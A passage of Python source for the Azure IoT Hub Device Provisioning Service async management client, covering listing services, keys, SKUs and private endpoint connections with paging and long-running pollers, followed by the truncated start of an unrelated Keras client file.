)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProvisioningServiceDescriptionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/provisioningServices'} # type: ignore
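
    async def _example_list_by_subscription_usage(self):
        """Hedged usage sketch, not part of the generated SDK surface: iterate the
        AsyncItemPaged returned by list_by_subscription with ``async for``. Assumes
        the usual ARM resource ``name`` attribute on each returned description."""
        names = []
        async for description in self.list_by_subscription():
            names.append(description.name)
        return names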
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ProvisioningServiceDescriptionListResult"]:
"""Get a list of all provisioning services in the given resource group.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProvisioningServiceDescriptionListResult or the
result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProvisioningServiceDescriptionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices'} # type: ignore
@distributed_trace_async
async def get_operation_result(
self,
operation_id: str,
resource_group_name: str,
provisioning_service_name: str,
asyncinfo: str = "true",
**kwargs: Any
) -> "_models.AsyncOperationResult":
"""Gets the status of a long running operation, such as create, update or delete a provisioning
service.
:param operation_id: Operation id corresponding to long running operation. Use this to poll for
the status.
:type operation_id: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service that the operation is running
on.
:type provisioning_service_name: str
:param asyncinfo: Async header used to poll on the status of the operation, obtained while
creating the long running operation.
:type asyncinfo: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AsyncOperationResult, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.AsyncOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AsyncOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_operation_result_request(
operation_id=operation_id,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
asyncinfo=asyncinfo,
template_url=self.get_operation_result.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AsyncOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_operation_result.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/operationresults/{operationId}'} # type: ignore
@distributed_trace
def list_valid_skus(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.IotDpsSkuDefinitionListResult"]:
"""Get the list of valid SKUs for a provisioning service.
Gets the list of valid SKUs and tiers for a provisioning service.
:param provisioning_service_name: Name of provisioning service.
:type provisioning_service_name: str
:param resource_group_name: Name of resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IotDpsSkuDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.IotDpsSkuDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IotDpsSkuDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_valid_skus_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_valid_skus.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_valid_skus_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("IotDpsSkuDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_valid_skus.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/skus'} # type: ignore
@distributed_trace_async
async def check_provisioning_service_name_availability(
self,
arguments: "_models.OperationInputs",
**kwargs: Any
) -> "_models.NameAvailabilityInfo":
"""Check if a provisioning service name is available.
Check if a provisioning service name is available. This will validate if the name is
syntactically valid and if the name is usable.
:param arguments: Set the name parameter in the OperationInputs structure to the name of the
provisioning service to check.
:type arguments: ~azure.mgmt.iothubprovisioningservices.models.OperationInputs
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NameAvailabilityInfo, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.NameAvailabilityInfo
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NameAvailabilityInfo"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(arguments, 'OperationInputs')
request = build_check_provisioning_service_name_availability_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.check_provisioning_service_name_availability.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('NameAvailabilityInfo', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_provisioning_service_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/checkProvisioningServiceNameAvailability'} # type: ignore
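    # Hedged usage sketch (illustrative). Reuses the IotDpsClient assumption
    # above; the docstring says to set the `name` field on OperationInputs, and
    # the `name_available` attribute on NameAvailabilityInfo is assumed here.
    #
    #   from azure.mgmt.iothubprovisioningservices.models import OperationInputs
    #
    #   async def name_is_free(client, candidate_name):
    #       info = await client.iot_dps_resource.check_provisioning_service_name_availability(
    #           OperationInputs(name=candidate_name))
    #       return info.name_available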
@distributed_trace
def list_keys(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.SharedAccessSignatureAuthorizationRuleListResult"]:
"""Get the security metadata for a provisioning service.
List the primary and secondary keys for a provisioning service.
:param provisioning_service_name: The provisioning service name to get the shared access keys
for.
:type provisioning_service_name: str
:param resource_group_name: resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SharedAccessSignatureAuthorizationRuleListResult
or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SharedAccessSignatureAuthorizationRuleListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_keys_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_keys.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_keys_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("SharedAccessSignatureAuthorizationRuleListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/listkeys'} # type: ignore
@distributed_trace_async
async def list_keys_for_key_name(
self,
provisioning_service_name: str,
key_name: str,
resource_group_name: str,
**kwargs: Any
) -> "_models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription":
"""Get a shared access policy by name from a provisioning service.
List primary and secondary keys for a specific key name.
:param provisioning_service_name: Name of the provisioning service.
:type provisioning_service_name: str
:param key_name: Logical key name to get key-values for.
:type key_name: str
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SharedAccessSignatureAuthorizationRuleAccessRightsDescription, or the result of
cls(response)
:rtype:
~azure.mgmt.iothubprovisioningservices.models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SharedAccessSignatureAuthorizationRuleAccessRightsDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_keys_for_key_name_request(
provisioning_service_name=provisioning_service_name,
key_name=key_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_keys_for_key_name.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SharedAccessSignatureAuthorizationRuleAccessRightsDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_keys_for_key_name.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/keys/{keyName}/listkeys'} # type: ignore
@distributed_trace_async
async def list_private_link_resources(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.PrivateLinkResources":
"""List private link resources.
List private link resources for the given provisioning service.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateLinkResources, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.PrivateLinkResources
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateLinkResources"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_private_link_resources_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_private_link_resources.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateLinkResources', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_private_link_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateLinkResources'} # type: ignore
@distributed_trace_async
async def get_private_link_resources(
self,
resource_group_name: str,
resource_name: str,
group_id: str,
**kwargs: Any
) -> "_models.GroupIdInformation":
"""Get the specified private link resource.
Get the specified private link resource for the given provisioning service.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param group_id: The name of the private link resource.
:type group_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: GroupIdInformation, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.GroupIdInformation
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.GroupIdInformation"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_private_link_resources_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
group_id=group_id,
template_url=self.get_private_link_resources.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('GroupIdInformation', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_private_link_resources.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateLinkResources/{groupId}'} # type: ignore
@distributed_trace_async
async def list_private_endpoint_connections(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> List["_models.PrivateEndpointConnection"]:
"""List private endpoint connections.
List private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of PrivateEndpointConnection, or the result of cls(response)
:rtype: list[~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.PrivateEndpointConnection"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_private_endpoint_connections_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_private_endpoint_connections.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[PrivateEndpointConnection]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_private_endpoint_connections.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections'} # type: ignore
@distributed_trace_async
async def get_private_endpoint_connection(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> "_models.PrivateEndpointConnection":
"""Get private endpoint connection.
Get private endpoint connection properties.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: PrivateEndpointConnection, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_private_endpoint_connection_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
template_url=self.get_private_endpoint_connection.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_private_endpoint_connection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
async def _create_or_update_private_endpoint_connection_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: "_models.PrivateEndpointConnection",
**kwargs: Any
) -> "_models.PrivateEndpointConnection":
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(private_endpoint_connection, 'PrivateEndpointConnection')
request = build_create_or_update_private_endpoint_connection_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_private_endpoint_connection_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_private_endpoint_connection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update_private_endpoint_connection(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: "_models.PrivateEndpointConnection",
**kwargs: Any
) -> AsyncLROPoller["_models.PrivateEndpointConnection"]:
"""Create or update private endpoint connection.
Create or update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
:type private_endpoint_connection:
~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_private_endpoint_connection_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
private_endpoint_connection=private_endpoint_connection,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_private_endpoint_connection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
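    # Hedged usage sketch (illustrative): awaiting the long-running operation
    # returned above. Same client-name assumptions as the earlier sketches.
    #
    #   async def approve_connection(client, rg, dps_name, conn_name, connection):
    #       poller = await client.iot_dps_resource.begin_create_or_update_private_endpoint_connection(
    #           rg, dps_name, conn_name, connection)
    #       return await poller.result()   # resolves to a PrivateEndpointConnection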
async def _delete_private_endpoint_connection_initial(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> Optional["_models.PrivateEndpointConnection"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.PrivateEndpointConnection"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_private_endpoint_connection_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
template_url=self._delete_private_endpoint_connection_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_private_endpoint_connection_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
@distributed_trace_async
async def begin_delete_private_endpoint_connection(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> AsyncLROPoller["_models.PrivateEndpointConnection"]:
"""Delete private endpoint connection.
Delete private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the provisioning
service.
:type resource_group_name: str
:param resource_name: The name of the provisioning service.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.PrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.PrivateEndpointConnection"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_private_endpoint_connection_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('PrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete_private_endpoint_connection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}'} # type: ignore
# ---- File: grid/clients/keras.py (repo: cthorey/Grid) ----
from . import base
from ..lib import utils
from .. import channels
import ipywidgets as widgets
import json
import random
from ..lib import keras_utils
class KerasClient(base.BaseClient):
def __init__(self,
min_om_nodes=1,
known_workers=list(),
include_github_known_workers=True,
verbose=True):
super().__init__(
min_om_nodes=min_om_nodes,
